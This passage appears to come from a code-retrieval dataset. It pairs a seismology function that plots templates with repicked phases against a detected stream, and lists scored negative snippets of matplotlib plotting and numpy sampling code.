limits\n if low is not None and high is not None:\n ax.set_xlim(low[0], high[0])\n ax.set_ylim(low[1], high[1])\n else:\n # Otherwise use first, last grid locations as low, high (for further mapping discretized samples)\n low = [splits[0] for splits in grid]\n high = [splits[-1] for splits in grid]\n\n # Map each discretized sample (which is really an index) to the center of corresponding grid cell\n # add low and high ends\n grid_extended = np.hstack((np.array([low]).T, grid, np.array([high]).T))\n # compute center of each grid cell\n grid_centers = (grid_extended[:, 1:] + grid_extended[:, :-1]) / 2\n locs = np.stack(grid_centers[i, discretized_samples[:, i]]\n for i in range(len(grid))).T # map discretized samples\n\n ax.plot(samples[:, 0], samples[:, 1], 'o') # plot original samples\n # plot discretized samples in mapped locations\n ax.plot(locs[:, 0], locs[:, 1], 's')\n # add a line connecting each original-discretized sample\n ax.add_collection(mc.LineCollection(\n list(zip(samples, locs)), colors='orange'))\n ax.legend(['original', 'discretized'])", "def show(data_set, number_points: int):\n print(f'info: Showing {number_points} as maximum.')\n sub_set_points = np.random.choice(range(data_set.shape[0]), size=min(data_set.shape[0], number_points))\n x = data_set[sub_set_points, 0]\n y = data_set[sub_set_points, 1]\n z = data_set[sub_set_points, 2]\n\n fig = plt.figure(figsize=(8, 8))\n ax = mplot3d.Axes3D(fig)\n ax.set_title('NMSLIB index 3D representation', fontsize=20)\n ax.scatter(xs=x, ys=y, zs=z)\n plt.show()", "def plot():\n pass", "def not_pokemon_function():\n # Ironic I'm using random inside seed\n numpy.random.seed(random.randint(1, 1000))\n sample = numpy.random.normal(size=1000)\n counts, bin_edges = numpy.histogram(sample, bins=39)\n fig = tpl.figure()\n fig.hist(counts, bin_edges, grid=[15, 25], force_ascii=False)\n fig.show()\n print(\"Hopefully this random histogram(because I couldn't generate plot graphs) which is generated cheers you up\")", "def sample(self):", "def cli(sample, title, dpi, out):\n click.echo('\\n' + '.' 
* 50)\n\n # reading the CDT file.\n try:\n signalData = pd.read_csv(sample, sep='\\t', index_col=0)\n except IOError:\n print(\"\\nUnable to OPEN input files !\\n\")\n sys.exit(1)\n\n # prepare PlotData, remove extra decimal values\n signalData = signalData.round(decimals=3)\n\n # General DEBUG\n print(signalData.index)\n print(signalData.shape)\n\n # retrieve the row index from the dataframe\n rowIndex = list(signalData.index)\n\n # retrieve data for Sense strand\n sx = list(signalData.loc[rowIndex[0]])\n\n # retrieve values for y axis and convert them to float\n sy = list(signalData.columns)\n sy = list(map(float, sy))\n\n # prepare PlotData for antisense strand\n cx = list(signalData.loc[rowIndex[1]])\n\n # convert antisense data values to negative, to plot it below the sense data.\n x1 = [-i for i in cx]\n\n fig, ax = plt.subplots()\n # ax = plt.axes([0, 0, 1, 1])\n\n plt.plot(sy, sx, 'b', sy, x1, 'r') # plotting the graph\n\n # adding the fill color for both the strands.\n d = numpy.zeros(len(sx))\n d1 = numpy.zeros(len(sx))\n plt.fill_between(sy, sx, where=sx >= d, interpolate=False, color=\"blue\")\n plt.fill_between(sy, x1, where=sx >= d1, interpolate=False, color=\"red\")\n\n # Option to draw a vertical line at origin on x-axis\n # plt.axvline(x=0, color='black', linestyle='--')\n\n # creating the grid lines\n # plt.grid(linestyle='--', linewidth=0.5)\n\n plt.gca().xaxis.grid(True, linestyle='--', linewidth=0.5)\n\n # adding custom xticks and yticks\n plt.xticks(range(-100, 150, 50), fontsize=14)\n\n # retrieve the yticks\n my_yticks = ax.get_yticks()\n # pprint.pprint(my_yticks)\n lastTick = int(len(my_yticks) - 1)\n\n # Handle edge cases, not to round off to -0.0\n if my_yticks[0] <= -1.0:\n # setting the ylim for the y-axis\n ax.set_ylim(math.ceil(my_yticks[0]), math.ceil(my_yticks[lastTick]))\n # setting the ticks for y-axis\n plt.yticks([math.ceil(my_yticks[0]), 0, math.ceil(\n my_yticks[lastTick])], fontsize=14)\n else:\n # setting the ylim for the y-axis\n ax.set_ylim(my_yticks[0], math.ceil(my_yticks[lastTick]))\n # setting the ticks for y-axis\n plt.yticks([my_yticks[0], 0, math.ceil(\n my_yticks[lastTick])], fontsize=14)\n\n plt.ylabel('Tags', fontsize=18)\n\n # setting the padding space between the y-axis label and the y-axis\n if math.ceil(my_yticks[lastTick]) < 10:\n ax.yaxis.labelpad = -10\n else:\n ax.yaxis.labelpad = -15\n\n # to increase the width of the plot borders and tick width\n plt.setp(ax.spines.values(), linewidth=2)\n plt.tick_params(length=8, width=2)\n\n # if you chose to not include the xticks , since they are similar to heatmap x-axis ticks\n # plt.xticks([-100,0,100])\n ax.xaxis.set_major_formatter(NullFormatter())\n ax.xaxis.set_ticks_position('none')\n\n # plt.yticks(range(-10,12,2))\n # plt.xticks([-500,0,500])\n\n # start,end=ax.get_ylim()\n # ax.set_ylim(start-1,end+1)\n\n # Customizing the border/ spines on each side of the plot.\n # frame1 = plt.gca()\n # frame1.axes.xaxis.set_ticklabels([])\n # frame1.axes.yaxis.set_ticklabels([])\n # frame1.axes.spines['top'].set_visible(False)\n # frame1.axes.spines['right'].set_visible(False)\n # frame1.axes.spines['bottom'].set_visible(False)\n # frame1.axes.spines['left'].set_visible(False)\n\n # plt.show()\n plt.title(title, fontsize=25)\n # setting the margins\n plt.margins(0.01)\n\n # saving the image at 300dpi , web standard for printing images.\n plt.savefig(out, facecolor=None, dpi=dpi, pad_inches=0)\n click.echo('\\n' + '.' 
* 50)", "def test_simple(make_plots=False):\n # Define the example you want to investigate:\n r1 = GeneralRandom(np.arange(10), np.ones(10), 100)\n r2 = GeneralRandom(np.arange(5), np.ones(5), 20)", "def _sample_vdisp(logvdisp_meansig, nmodel=1, rand=None):\n if rand is None:\n rand = np.random.RandomState()\n\n fracvdisp = (0.1, 40)\n\n nvdisp = int(np.max( ( np.min( ( np.round(nmodel * fracvdisp[0]), fracvdisp[1] ) ), 1 ) ))\n vvdisp = 10**rand.normal(logvdisp_meansig[0], logvdisp_meansig[1], nvdisp)\n vdisp = rand.choice(vvdisp, nmodel)\n\n return vdisp", "def sample(self, nsamples=1, weighted=True):\n weights = self.areas / np.sum(self.areas) if weighted else None\n index = np.random.choice(a=len(self.geometries), size=nsamples, p=weights)\n\n labels = []\n rows = []\n cols = []\n for idx in index:\n polygon = self.geometries[idx]['polygon']\n label = self.geometries[idx]['label']\n point = PointSampler.random_point(polygon.envelope.bounds)\n if PointSampler.contains(polygon, point):\n labels.append(label)\n rows.append(int(point.y))\n cols.append(int(point.x))\n # samples.append({'label':label, 'row':point.y, 'col':point.x})\n\n return labels, rows, cols", "def test_plot(arg):\n source_data = data.Biofile(arg)\n sample = source_data.get_header()\n feature = source_data.get_index()\n sample_size, feature_size = 106, 12042\n sample = sample[:sample_size]\n #xshape = (106 12042)\n print(sample, feature)\n X = source_data.get_matrix().T[:sample_size, :feature_size]\n mx = 100\n labs = ['rbf','poly','sigmoid']\n semi_r = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter = mx, parameter = 100) #rbf 0.5\n semi_r_con = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter = mx, kernel='poly', parameter= 0.5)#ploy 2\n semi_r_con1 = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter=mx, kernel='sigmoid', parameter= 0.1) #sigmoid 0.5\n semi_r_con2 = util.convex_non_negative_factorization(X.T, max_iter=mx, n_components=2)\n\n #semi_r = util.semi_non_negative_factorization_with_straint(X.T, max_iter = mx,n_components=2 ,initialization= 'Kmeans',alpha = 0.01, beta = 0.01)\n #semi_r_con = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2 ,initialization= 'Kmeans',alpha= 10, beta = 10)\n #semi_r_con1 = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2, initialization= 'Kmeans',alpha= 0, beta = 10)\n #semi_r_con2 = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2, initialization= 'Kmeans',alpha= 10, beta = 0)\n #convex_r_con = util.convex_non_negative_factorization(X.T, n_components=2, max_iter=mx)\n\n G, G1, G2, G3 = semi_r[1], semi_r_con[1], semi_r_con1[1], semi_r_con2[1]\n result, result1, result2, result3 = semi_r[2], semi_r_con[2], semi_r_con1[2], semi_r_con2[2]\n x = [i for i in range(mx)]\n # plot the losses function\n plt.title(\"losses function of {}\".format(arg[:-4]))\n plt.xlabel(\"iteration times\")\n plt.ylabel(\"losses\")\n\n plt.plot(x, result[:mx], 'r', marker = '.', label = 'kNMF({})'.format(labs[0]))\n plt.plot(x, result1[:mx], 'b', marker ='.' , label = 'kNMF({})'.format(labs[1]))\n plt.plot(x, result2[:mx], 'c', marker ='.', label = 'kNMF({})'.format(labs[2]))\n plt.plot(x, result3[:mx], 'm', marker ='.', label = 'cvxnmf')\n \"\"\"\n plt.plot(x, result[:mx], 'r', marker = '.', label = 'sNMF')\n plt.plot(x, result1[:mx], 'b', marker ='.' 
, label = 'sNMF(0.5,0.5)')\n plt.plot(x, result2[:mx], 'c', marker ='.', label = 'sNMF(0,0.5)')\n plt.plot(x, result3[:mx], 'm', marker ='.', label = 'sNMF(0.5,1)')\n plt.plot(x, result4[:mx], 'k', marker = '.', label = 'cvx-NMF')\n \"\"\"\n plt.legend(bbox_to_anchor=[1,1])\n plt.grid()\n plt.show()\n\n #plot the clustering result\n plt1 = plt\n plt1.subplot(221)\n plt1.plot(G[:,0], G[:,1], 'ro')\n plt1.title(u'the distribution of items(knmf({}))'.format(labs[0]))\n #items = zip(sample, G)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(222)\n plt1.plot(G1[:,0], G1[:,1], 'bo')\n\n plt1.title(u'the distribution of items(knmf({}))'.format(labs[1]))\n\n #items = zip(sample, G1)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(223)\n plt1.plot(G2[:,0], G2[:,1], 'co')\n plt1.title(u'the distribution of items((knmf({}))'.format(labs[2]))\n #items = zip(sample, G4)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(224)\n plt1.plot(G3[:,0], G3[:,1], 'mo')\n plt1.title(u'the distribution of items(convex-nmf))')\n #items = zip(sample, G2)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.show()", "def random_simulation(self, title, simulation=False):\n\n counter = 0\n plt.figure()\n\n # plot each battery\n for battery in self.grid.batteries:\n plt.plot(battery.x, battery.y, marker='x', color=colors[counter],\n markersize=10)\n x = []\n y = []\n for house in battery.connections:\n x.append(house.x)\n y.append(house.y)\n plt.scatter(x, y, marker='p', color=colors[counter])\n counter += 1\n\n # plot the connection\n counter = 0\n for battery in self.grid.batteries:\n for house in battery.connections:\n curr_x, curr_y = house.x, house.y\n end_x, end_y = battery.x, battery.y\n if curr_x > end_x:\n x_step = -1\n else:\n x_step = 1\n if curr_y > end_y:\n y_step = -1\n else:\n y_step = 1\n while not curr_x == end_x and not curr_y == end_y:\n if random.random() < 0.5:\n plt.plot([curr_x, curr_x], [curr_y, curr_y + y_step],\n color=colors[counter], linewidth=.3)\n curr_y = curr_y + y_step\n else:\n plt.plot([curr_x, curr_x + x_step], [curr_y, curr_y],\n color=colors[counter], linewidth=.3)\n curr_x = curr_x + x_step\n plt.plot([curr_x, end_x], [curr_y, end_y],\n color=colors[counter], linewidth=.3)\n counter += 1\n\n # display the process in an animation\n if simulation:\n plt.pause(1)\n plt.draw()", "def test_sampling(self):\n dim = Fidelity(\"epoch\", 1, 2)\n assert dim.sample() == [2]\n dim = Fidelity(\"epoch\", 1, 5)\n assert dim.sample() == [5]\n dim = Fidelity(\"epoch\", 1, 5)\n assert dim.sample(4) == [5] * 4", "def sample(self):\n raise NotImplementedError", "def sample(self):\n raise NotImplementedError", "def draw(probs, occ_rep, Nsamp):\n Ns, L = occ_rep.shape\n shots= np.empty((Nsamp,L))\n results = np.random.choice(list(range(len(probs))), Nsamp, p=probs)\n for ii in range(Nsamp):\n shots[ii, : ] = occ_rep[results[ii], :]\n return shots", "def test_sample(self):\n seed = 5\n space = Space()\n probs = (0.1, 0.2, 0.3, 
0.4)\n categories = (\"asdfa\", 2, 3, 4)\n dim1 = Categorical(\"yolo\", OrderedDict(zip(categories, probs)), shape=(2, 2))\n space.register(dim1)\n dim2 = Integer(\"yolo2\", \"uniform\", -3, 6)\n space.register(dim2)\n dim3 = Real(\"yolo3\", \"norm\", 0.9)\n space.register(dim3)\n\n point = space.sample(seed=seed)\n rng = check_random_state(seed)\n test_point = [\n dict(\n yolo=dim1.sample(seed=rng)[0],\n yolo2=dim2.sample(seed=rng)[0],\n yolo3=dim3.sample(seed=rng)[0],\n )\n ]\n assert len(point) == len(test_point) == 1\n assert len(point[0].params) == len(test_point[0]) == 3\n assert np.all(point[0].params[\"yolo\"] == test_point[0][\"yolo\"])\n assert point[0].params[\"yolo2\"] == test_point[0][\"yolo2\"]\n assert point[0].params[\"yolo3\"] == test_point[0][\"yolo3\"]\n\n points = space.sample(2, seed=seed)\n rng = check_random_state(seed)\n points1 = dim1.sample(2, seed=rng)\n points2 = dim2.sample(2, seed=rng)\n points3 = dim3.sample(2, seed=rng)\n test_points = [\n dict(yolo=points1[0], yolo2=points2[0], yolo3=points3[0]),\n dict(yolo=points1[1], yolo2=points2[1], yolo3=points3[1]),\n ]\n assert len(points) == len(test_points) == 2\n for i in range(2):\n assert len(points[i].params) == len(test_points[i]) == 3\n assert np.all(points[i].params[\"yolo\"] == test_points[i][\"yolo\"])\n assert points[i].params[\"yolo2\"] == test_points[i][\"yolo2\"]\n assert points[i].params[\"yolo3\"] == test_points[i][\"yolo3\"]", "def random_sample(self, n):\n indices = random.sample(xrange(np.shape(self.data)[0]), n)\n table = DataTable(self.data[indices], self.dims, self.legends, self.tags.copy())\n return table", "def plot_random_faces(faces):\n selects = np.random.random_integers(0, 20000, 16)\n plt.figure()\n for k in range(16):\n plt.subplot(4, 4, k+1)\n plot_face(faces.data[selects[k]])\n if faces.target[k] == 1:\n plt.title('smile')\n else:\n plt.title('ugly')", "def varying_noise_continuous_ndim_without_category(self, figure, iteration, order, total_continuous_dim, result_path):\n\n continuous_sample_points = np.linspace(-2.0, 2.0, 20)\n #a specific noise factor will be varied with 10 steps.\n\n num_points, steps = 10, len(continuous_sample_points)\n # each step has points with randomly-sampled other noise factor\n\n\n continuous_noise = []\n for _ in range(num_points):\n cur_sample = np.random.normal(size=[1, total_continuous_dim])\n continuous_noise.extend([cur_sample]*steps)\n continuous_noise = np.concatenate(continuous_noise)\n\n varying_factor = np.tile(continuous_sample_points, num_points)\n continuous_noise[:, order] = varying_factor \n continuous_noise = np.float32(continuous_noise)\n \n display_images = []\n with variable_scope.variable_scope(self.gen_scope.name, reuse = True):\n varying_data = self.generator(continuous_noise)\n\n #colors = cm.rainbow(np.linspace(0, 1, len(continuous_sample_points)))\n colors = [ ( 1/(i%steps + 1), 0, (i%steps + 1)/steps, 1) for i in range( continuous_noise.shape[0] )] #red to green\n\n scales = [ (1.1**(i%steps + 1))*10 for i in range( continuous_noise.shape[0] )]\n\n gen_data_test = self.sess.run(varying_data)\n ax1 = figure\n ax1.scatter(gen_data_test[:, 0], gen_data_test[:, 1], s=scales, c=(0, 0, 0))\n\n for i, factor in enumerate(continuous_noise[:, order]):\n ax1.annotate(str(round(factor, 2)), (gen_data_test[i, 0], gen_data_test[i, 1]), color=colors[i])", "def sample(self, nsample=None, **kwargs):\n if len(kwargs) > 0:\n self.update(**kwargs)\n # draw a zred from pdf(z)\n zred = self.zred_dist.sample()\n\n # draw from the mass function at the 
above zred\n cdf_mass = cdf_mass_func_at_z(z=zred, logm=self.mgrid, const_phi=self.params['const_phi'], bounds=[self.params['mass_mini'], self.params['mass_maxi']])\n mass = draw_sample(xs=self.mgrid, cdf=cdf_mass)\n\n # given mass from above, draw logzsol\n met_dist = priors.FastTruncatedNormal(a=self.params['z_mini'], b=self.params['z_maxi'],\n mu=loc_massmet(mass), sig=scale_massmet(mass))\n met = met_dist.sample()\n\n return np.array([zred, mass, met])", "def sample(self, n):\n raise NotImplementedError", "def test_plot_timeseries_multivariate(tmpdir, random):\n x = np.linspace(start=0, stop=10, num=20)\n ys = np.stack((np.sin(x), np.cos(x), np.tan(0.4 * x)))\n segments = get_test_segments(data=ys)\n output_path = Path(tmpdir) / 'temp_visualization_test_multivariate.png'\n\n plot_timeseries(x=x,\n y=ys.T,\n segments=segments,\n show_plot=False,\n output_filename=output_path)\n\n assert output_path.exists()", "def plotting_helper_method(x_axis, y_axis, df):\n genre_dict = {\n 'g':'Rock',\n 'b':'Hip-Hop',\n 'r':'Pop'\n }\n for color, genre in genre_dict.items():\n filtered_df = df[df['genre'] == genre]\n plt.scatter(filtered_df[x_axis], filtered_df[y_axis], c=color, label=genre)", "def sample (self, n):\n y = self.bins\n x = np.r_[0, self.values.cumsum ()] / self.sum\n # interpolate inverse CDF\n out = np.interp (np.random.random (n), x, y)\n if n == 1:\n return out[0]\n else:\n return out.reshape ((n,))", "def test_sampler():\n L = 25 # Lattice size\n beta = 0.1 # Inverse temperature\n h = 1E-2 # Step size\n n = 10 # Number of velocity verlet steps.\n Nsteps = int(1E4) # Number of MCMC steps\n\n # First plot the spins on the circle for large beta.\n\n # Get points on the circle.\n angle = np.linspace(0, 2*np.pi, 1000)\n circle = [np.cos(angle), np.sin(angle)]\n\n # Sample from the model and get the spin vectors.\n xy = HybridMC(L, beta, h, n, Nsteps)\n spins = xy.spinVectors()\n\n # Now plot the result.\n plt.figure(1)\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n plt.title(\"XY model sample ($L = {:d}$ and $\\\\beta = $ {:0.1f})\".format(L, beta))\n plt.xlabel('$\\\\vec{\\\\sigma}_x$')\n plt.ylabel('$\\\\vec{\\\\sigma}_y$')\n plt.axis('equal')\n plt.xlim([-1, 1])\n plt.ylim([-1, 1])\n plt.plot(spins[:,0], spins[:,1], 'bo')\n plt.plot(circle[0], circle[1], 'k:')", "def random(self=None, sample=100, min=0, max=100):\r\n\t\treturn DataStatistics([randint(min, max) for i in range(sample)])", "def inclass1():\n import numpy as np\n import matplotlib.pyplot as plt\n\n\n N = 50\n x = np.random.rand(N)\n y = np.random.rand(N)\n colors = np.random.rand(N)\n area = np.pi * (15 * np.random.rand(N))**2 # 0 to 15 point radiuses\n\n plt.scatter(x, y, s=area, c=colors, alpha=0.5)\n plt.show()", "def labelledCube(self, dim=None, sample=None):\n if dim is None:\n dim = self.D\n if sample is None:\n sample = range(1, int(self.poolSize)+1)\n \n all_labels = list(it.product(*(range(self.slices),) * dim))\n self.sample_labels = set(random.sample(all_labels, k= len(sample)))\n labelled_sample = {label : sample for label, sample in zip(self.sample_labels, sample)}\n self.text[\"labelledSamples\"] = labelled_sample\n return labelled_sample", "def get_sample(config, n_sample=1):\n if config['distribution'] == 'binary':\n data = np.random.choice([0, 1], size=n_sample, replace=True, p=config['pmf'])\n\n elif config['distribution'] == 'discrete':\n data = np.random.choice(config['category'], size=n_sample, replace=True, p=config['pmf'])\n\n elif config['distribution'] == 'uniform':\n assert 
float(config['min']) < float(config['max'])\n data=np.random.uniform(low=float(config['min']),high=float(config['max']),size=n_sample)\n\n elif config['distribution'] == 'gaussian':\n data=np.random.normal(loc=float(config['mean']),scale=float(config['std']),size=n_sample)\n data = np.maximum(data, float(config['min']))\n data = np.minimum(data, float(config['max']))\n\n elif config['distribution'] == 'uniform_int':\n if int(config['min'])==int(config['max']):\n data=int(config['min'])*np.ones((n_sample,),dtype='int32')\n else:\n data=np.random.randint(int(config['min']),high=int(config['max']),size=n_sample)\n\n else:\n log.warning('Warning: unknown distribution type: %s' % config['distribution'])\n data = []\n\n return data", "def test_sampler():\n L = 25 # Lattice size\n beta = 10.0 # Inverse temperature\n h = 1E-2 # Step size\n Nsteps = int(1E4) # Number of MCMC steps\n\n # First plot the spins on the circle for large beta.\n\n # Get points on the circle.\n angle = np.linspace(0, 2*np.pi, 1000)\n circle = [np.cos(angle), np.sin(angle)]\n\n # Sample from the model and get the spin vectors.\n xy = sampleXY(L, beta, h, Nsteps)\n spins = xy.spinVectors()\n\n # Now plot the result.\n plt.figure(1)\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n plt.title(\"XY model sample ($L = {:d}$ and $\\\\beta = $ {:0.1f})\".format(L, beta))\n plt.xlabel('$\\\\vec{\\\\sigma}_x$')\n plt.ylabel('$\\\\vec{\\\\sigma}_y$')\n plt.axis('equal')\n plt.xlim([-1, 1])\n plt.ylim([-1, 1])\n plt.plot(spins[:,0], spins[:,1], 'bo')\n plt.plot(circle[0], circle[1], 'k:')\n\n # Now plot the spins for small beta.\n beta = 0.1 # Inverse temperature\n\n # Sample from the model and get the spin vectors.\n xy = sampleXY(L, beta, h, Nsteps)\n spins = xy.spinVectors()\n\n # Now plot the result.\n plt.figure(2)\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n plt.title(\"XY model sample ($L = {:d}$ and $\\\\beta = $ {:0.1f})\".format(L, beta))\n plt.xlabel('$\\\\vec{\\\\sigma}_x$')\n plt.ylabel('$\\\\vec{\\\\sigma}_y$')\n plt.axis('equal')\n plt.xlim([-1, 1])\n plt.ylim([-1, 1])\n plt.plot(spins[:,0], spins[:,1], 'bo')\n plt.plot(circle[0], circle[1], 'k:')", "def sample(self):\r\n raise NotImplementedError", "def plot_data(samples, datafield):\n points = [{\n 'name': sample.lims_id,\n 'y': getattr(sample, datafield),\n } for sample in samples]\n return points", "def sample(self, n=1):\n raise NotImplementedError", "def __call__(self, samples_number):\n self.sampler.sample(samples_number)", "def tst_random_set():\n final_wave, final_spec, final_z = desi_qso_templates(\n outfil='test_random_set.fits', N_perz=100, seed=12345)", "def fetch_examples_in_db(self, cat_choice):\n ten_examples = []\n product_choice_id = 0\n self.cur.execute(\"SELECT id FROM Product WHERE nova = 4 AND category = %s\",\n (self.categories[cat_choice], ))\n examples = self.cur.fetchall()\n for i in range (0, 10):\n ten_examples.append(examples[random.randint(0, len(examples))][0])\n for i, element in enumerate(ten_examples):\n print (\"Choix n°{}\".format(i+1))\n self.display_product_from_id(element)\n\n print (\"Veuillez choisir le produit que vous voulez substituer:\")\n product_choice = self.secure_input(1, len(ten_examples))\n self.product_choice_id = ten_examples[product_choice-1]\n self.fetch_substitutes(cat_choice)", "def sample_from_concept(self):\n return random.choice(self.active_concept.extension)", "def sample_rides(df, nSample):\n return df.iloc[numpy.random.choice(df.index.values, nSample)]" ]
[ "0.66966414", "0.65395725", "0.6370684", "0.6370684", "0.63241494", "0.63104224", "0.6130251", "0.5980402", "0.59737", "0.5940193", "0.5889786", "0.58694214", "0.5850805", "0.5846972", "0.5820033", "0.581082", "0.5789322", "0.57852453", "0.5775959", "0.5773435", "0.5740156", "0.56807977", "0.56638354", "0.5624795", "0.5591308", "0.55438626", "0.553558", "0.5520163", "0.55136865", "0.55100244", "0.54962987", "0.5475792", "0.5442217", "0.542961", "0.54156053", "0.5375769", "0.5366779", "0.536335", "0.53586763", "0.53466356", "0.5346605", "0.5339839", "0.5339006", "0.5328322", "0.5325167", "0.53247696", "0.5311137", "0.53108054", "0.52761924", "0.52756226", "0.5258675", "0.5255063", "0.52535284", "0.52472335", "0.52428776", "0.52363783", "0.5225844", "0.522368", "0.5221444", "0.52199906", "0.5219327", "0.5217921", "0.5213972", "0.52127844", "0.52069515", "0.5201249", "0.52006143", "0.5199953", "0.5196588", "0.5191507", "0.51850444", "0.5183959", "0.5183004", "0.51828766", "0.5182124", "0.5182124", "0.51727694", "0.5169659", "0.5160622", "0.51579374", "0.5147979", "0.51426953", "0.5141455", "0.5141361", "0.5138158", "0.51361954", "0.5135497", "0.51249355", "0.51206505", "0.51181626", "0.5116491", "0.5114775", "0.5112976", "0.5111149", "0.5108922", "0.51058227", "0.5097532", "0.50974166", "0.50965255", "0.5096116" ]
0.6025946
7
Plot a template over a detected stream, with picks corrected by lagcalc.
def plot_repicked(template, picks, det_stream, size=(10.5, 7.5), save=False, savefile=None, title=False): # _check_save_args(save, savefile) fig, axes = plt.subplots(len(det_stream), 1, sharex=True, figsize=size) if len(template) > 1: axes = axes.ravel() mintime = det_stream.sort(['starttime'])[0].stats.starttime template.sort(['network', 'station', 'starttime']) lengths = [] lines = [] labels = [] n_templates_plotted = 0 for i, tr in enumerate(det_stream.sort(['starttime'])): # Cope with a single channel template case. if len(det_stream) > 1: axis = axes[i] else: axis = axes tr_picks = [pick for pick in picks if pick.waveform_id.station_code == tr.stats.station and pick.waveform_id.channel_code[0] + pick.waveform_id.channel_code[-1] == tr.stats.channel[0] + tr.stats.channel[-1]] if len(tr_picks) > 1: msg = 'Multiple picks on channel %s' % tr.stats.station + ', ' + \ tr.stats.channel raise NotImplementedError(msg) if len(tr_picks) == 0: msg = 'No pick for channel %s' % tr.stats.station + ', ' + \ tr.stats.channel print(msg) else: pick = tr_picks[0] pick_delay = pick.time - mintime delay = tr.stats.starttime - mintime y = tr.data # Normalise if len(tr_picks) > 0 and template: y /= max(abs(y[int(pick_delay/tr.stats.delta):int(pick_delay/tr.stats.delta) + len(template[0])])) else: y /= max(abs(y)) x = np.linspace(0, (len(y) - 1) * tr.stats.delta, len(y)) x += delay axis.plot(x, y, 'k', linewidth=1.5) axis.set_ylim(-max(abs(y)), max(abs(y))) if template.select(station=tr.stats.station, channel=tr.stats.channel): btr = template.select(station=tr.stats.station, channel=tr.stats.channel)[0] bdelay = pick.time - mintime by = btr.data by /= max(abs(by)) bx = np.linspace(0, (len(by) - 1) * btr.stats.delta, len(by)) bx += bdelay if len(tr_picks) > 0: # Heads up for the x - 0.1 fudge factor here accounting for template pre-pick time template_line, = axis.plot(bx - 0.1, by, 'r', linewidth=1.6, label='Template') if not pick.phase_hint: pcolor = 'k' label = 'Unknown pick' elif 'P' in pick.phase_hint.upper(): pcolor = 'red' label = 'P-pick' elif 'S' in pick.phase_hint.upper(): pcolor = 'blue' label = 'S-pick' else: pcolor = 'k' label = 'Unknown pick' pdelay = pick.time - mintime ccval = pick.comments[0].text.split('=')[-1] line = axis.axvline(x=pdelay, color=pcolor, linewidth=2, linestyle='--', label=label) axis.text(pdelay, max(by), ccval, fontsize=12) if label not in labels: lines.append(line) labels.append(label) if n_templates_plotted == 0: lines.append(template_line) labels.append('Template') n_templates_plotted += 1 lengths.append(max(bx[-1], x[-1])) else: lengths.append(bx[1]) axis.set_ylabel('.'.join([tr.stats.station, tr.stats.channel]), rotation=0, horizontalalignment='right') axis.yaxis.set_ticks([]) if len(det_stream) > 1: axis = axes[len(det_stream) - 1] else: axis = axes axis.set_xlabel('Time (s) from %s' % mintime.datetime.strftime('%Y/%m/%d %H:%M:%S.%f')) plt.figlegend(lines, labels, 'upper right') if title: if len(template) > 1: axes[0].set_title(title) else: axes.set_title(title) else: plt.subplots_adjust(top=0.98) plt.tight_layout() plt.subplots_adjust(hspace=0) if not save: plt.show() plt.close() else: plt.savefig(savefile) plt.close() return fig
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def xx_plot(epoch, model, features, filters, figname, fgal=0.5):\n # fetch Stripe 82 data\n X, Xcov = fetch_prepped_s82data(epoch, fgal, features, filters)\n Xcoadd, Xcoaddcov = fetch_prepped_s82data(epoch, fgal, features,\n filters, use_single=False)\n N = 20000\n X = X[:N]\n Xcov = Xcov[:N]\n Xcoadd = Xcoadd[:N]\n Xcoaddcov = Xcoaddcov[:N]\n\n # unpickle the XD model\n if type(model) == str: \n f = open(model, 'rb')\n model = cPickle.load(f)\n f.close()\n\n # Calculate the posteriors, draw samples\n a, m, v = model.posterior(X, Xcov)\n posts = np.zeros_like(X)\n for i in range(X.shape[0]):\n posts[i] = model.sample(a[i], m[i], v[i], size=1)\n\n lo = [0.01, 0.02, 0.06]\n hi = [0.99, 0.96, 0.98]\n idx = [0, 1, 4]\n bins = [100, 100, 300]\n label = ['psfmag $r$', 'modelmag $u-g$', 'modelmag $i-z$']\n N = len(idx)\n fs = 5\n lsize = 20\n f = pl.figure(figsize=(N * fs, 2 * fs))\n pl.subplots_adjust(wspace=0.3)\n for i in range(N):\n x = X[:, idx[i]]\n y = Xcoadd[:, idx[i]]\n p = posts[:, idx[i]]\n ind = (y > -999) & (Xcoaddcov[:, idx[i]][:, idx[i]] < 10.)\n x = x[ind]\n y = y[ind]\n p = p[ind]\n ax = pl.subplot(2, N, i + 1)\n v = np.sort(x)\n mn, mx = v[np.int(lo[i] * x.shape[0])], v[np.int(hi[i] * x.shape[0])]\n hist2d(x, y, ax=ax, bins=bins[i], plot_contours=True,\n plot_datapoints=True)\n pl.plot([mn, mx], [mn, mx], 'r', lw=2)\n pl.ylabel('Coadd ' + label[i], fontsize=lsize)\n pl.xlabel('Single Epoch ' + label[i], fontsize=lsize)\n pl.xlim(mn, mx)\n pl.ylim(mn, mx)\n ax = pl.subplot(2, N, i + 4)\n hist2d(p, y, ax=ax, bins=bins[i], plot_contours=True,\n plot_datapoints=True)\n pl.plot([mn, mx], [mn, mx], 'r', lw=2)\n pl.xlim(mn, mx)\n pl.ylim(mn, mx)\n pl.ylabel('Coadd ' + label[i], fontsize=lsize)\n pl.xlabel('XD Posterior ' + label[i], fontsize=lsize)\n f.savefig(figname, bbox_inches='tight')", "def makePlot(timeStamp):\n\n #-------------------------------------------------------------------------\n # Create figure and axes\n #-------------------------------------------------------------------------\n\n width = 12 # inches\n height = 8 # inches\n fig = plt.figure(figsize=(width, height))\n\n # We'll use 